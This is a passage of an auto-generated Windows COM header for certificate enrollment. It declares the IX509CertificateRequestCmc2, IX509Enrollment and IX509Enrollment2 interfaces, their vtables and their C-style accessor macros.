    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCmc2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCmc2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCmc2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCmc2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCmc2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCmc2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCmc2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCmc2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCmc2_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCmc2_InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,RenewalRequest,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequest(This,pInnerRequest)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequest(This,pInnerRequest) ) 

#define IX509CertificateRequestCmc2_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCmc2_get_RequesterName(This,pValue)	\
    ( (This)->lpVtbl -> get_RequesterName(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_RequesterName(This,Value)	\
    ( (This)->lpVtbl -> put_RequesterName(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplateName(This,pInnerRequest,strTemplateName) ) 

#define IX509CertificateRequestCmc2_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_TransactionId(This,pValue)	\
    ( (This)->lpVtbl -> get_TransactionId(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_TransactionId(This,Value)	\
    ( (This)->lpVtbl -> put_TransactionId(This,Value) ) 

#define IX509CertificateRequestCmc2_get_SenderNonce(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SenderNonce(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_SenderNonce(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SenderNonce(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCmc2_get_ArchivePrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ArchivePrivateKey(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_ArchivePrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_ArchivePrivateKey(This,Value) ) 

#define IX509CertificateRequestCmc2_get_KeyArchivalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_KeyArchivalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_put_KeyArchivalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyArchivalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCmc2_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestCmc2_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestCmc2_get_EncryptedKeyHash(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncryptedKeyHash(This,Encoding,pValue) ) 

#define IX509CertificateRequestCmc2_get_SignerCertificates(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificates(This,ppValue) ) 


#define IX509CertificateRequestCmc2_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromInnerRequestTemplate(This,pInnerRequest,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestCmc2_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestCmc2_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 

#define IX509CertificateRequestCmc2_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCmc2_CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain)	\
    ( (This)->lpVtbl -> CheckCertificateSignature(This,pSignerCertificate,ValidateCertificateChain) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCmc2_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0081 */
/* [local] */ 

typedef 
enum InstallResponseRestrictionFlags
    {	AllowNone	= 0,
	AllowNoOutstandingRequest	= 0x1,
	AllowUntrustedCertificate	= 0x2,
	AllowUntrustedRoot	= 0x4
    } 	InstallResponseRestrictionFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0081_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0081_v0_0_s_ifspec;

#ifndef __IX509Enrollment_INTERFACE_DEFINED__
#define __IX509Enrollment_INTERFACE_DEFINED__

/* interface IX509Enrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab346-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromRequest( 
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE CreateRequest( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Enroll( void) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreatePFX( 
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Request( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NameValuePairs( 
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Response( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateFriendlyName( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CertificateDescription( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CertificateDescription( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAConfigString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *CreateRequest )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Enroll )( 
            __RPC__in IX509Enrollment * This);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InstallResponse )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *CreatePFX )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ PFXExportOptions ExportOptions,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NameValuePairs )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509NameValuePairs **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Status )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Certificate )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Response )( 
            __RPC__in IX509Enrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateFriendlyName )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_CertificateDescription )( 
            __RPC__in IX509Enrollment * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAConfigString )( 
            __RPC__in IX509Enrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509EnrollmentVtbl;

    interface IX509Enrollment
    {
        CONST_VTBL struct IX509EnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Enrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Enrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Enrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Enrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Enrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Enrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Enrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Enrollment_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509Enrollment_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509Enrollment_InitializeFromRequest(This,pRequest)	\
    ( (This)->lpVtbl -> InitializeFromRequest(This,pRequest) ) 

#define IX509Enrollment_CreateRequest(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreateRequest(This,Encoding,pValue) ) 

#define IX509Enrollment_Enroll(This)	\
    ( (This)->lpVtbl -> Enroll(This) ) 

#define IX509Enrollment_InstallResponse(This,Restrictions,strResponse,Encoding,strPassword)	\
    ( (This)->lpVtbl -> InstallResponse(This,Restrictions,strResponse,Encoding,strPassword) ) 

#define IX509Enrollment_CreatePFX(This,strPassword,ExportOptions,Encoding,pValue)	\
    ( (This)->lpVtbl -> CreatePFX(This,strPassword,ExportOptions,Encoding,pValue) ) 

#define IX509Enrollment_get_Request(This,pValue)	\
    ( (This)->lpVtbl -> get_Request(This,pValue) ) 

#define IX509Enrollment_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509Enrollment_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509Enrollment_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509Enrollment_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509Enrollment_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 

#define IX509Enrollment_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509Enrollment_get_Status(This,ppValue)	\
    ( (This)->lpVtbl -> get_Status(This,ppValue) ) 

#define IX509Enrollment_get_Certificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Certificate(This,Encoding,pValue) ) 

#define IX509Enrollment_get_Response(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Response(This,Encoding,pValue) ) 

#define IX509Enrollment_get_CertificateFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateFriendlyName(This,pValue) ) 

#define IX509Enrollment_put_CertificateFriendlyName(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateFriendlyName(This,strValue) ) 

#define IX509Enrollment_get_CertificateDescription(This,pValue)	\
    ( (This)->lpVtbl -> get_CertificateDescription(This,pValue) ) 

#define IX509Enrollment_put_CertificateDescription(This,strValue)	\
    ( (This)->lpVtbl -> put_CertificateDescription(This,strValue) ) 

#define IX509Enrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define IX509Enrollment_get_CAConfigString(This,pValue)	\
    ( (This)->lpVtbl -> get_CAConfigString(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Enrollment_INTERFACE_DEFINED__ */


#ifndef __IX509Enrollment2_INTERFACE_DEFINED__
#define __IX509Enrollment2_INTERFACE_DEFINED__

/* interface IX509Enrollment2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Enrollment2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab350-217d-11da-b2a4-000e7bbb2b09")
    IX509Enrollment2 : public IX509Enrollment
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InstallResponse2( 
            /* [in] */ InstallResponseRestrictionFlags Restrictions,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPassword,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerUrl,
            /* [in] */ __RPC__in BSTR strEnrollmentPolicyServerID,
            /* [in] */ PolicyServerUrlFlags EnrollmentPolicyServerFlags,
            /* [in] */ X509EnrollmentAuthFlags authFlags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestIdString( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509Enrollment2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Enrollment2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Enrollment2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Enrollment2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Enrollment2 * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromRequest )( 
            __RPC__in IX509Enrollment2 * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequest *pRequest);
        
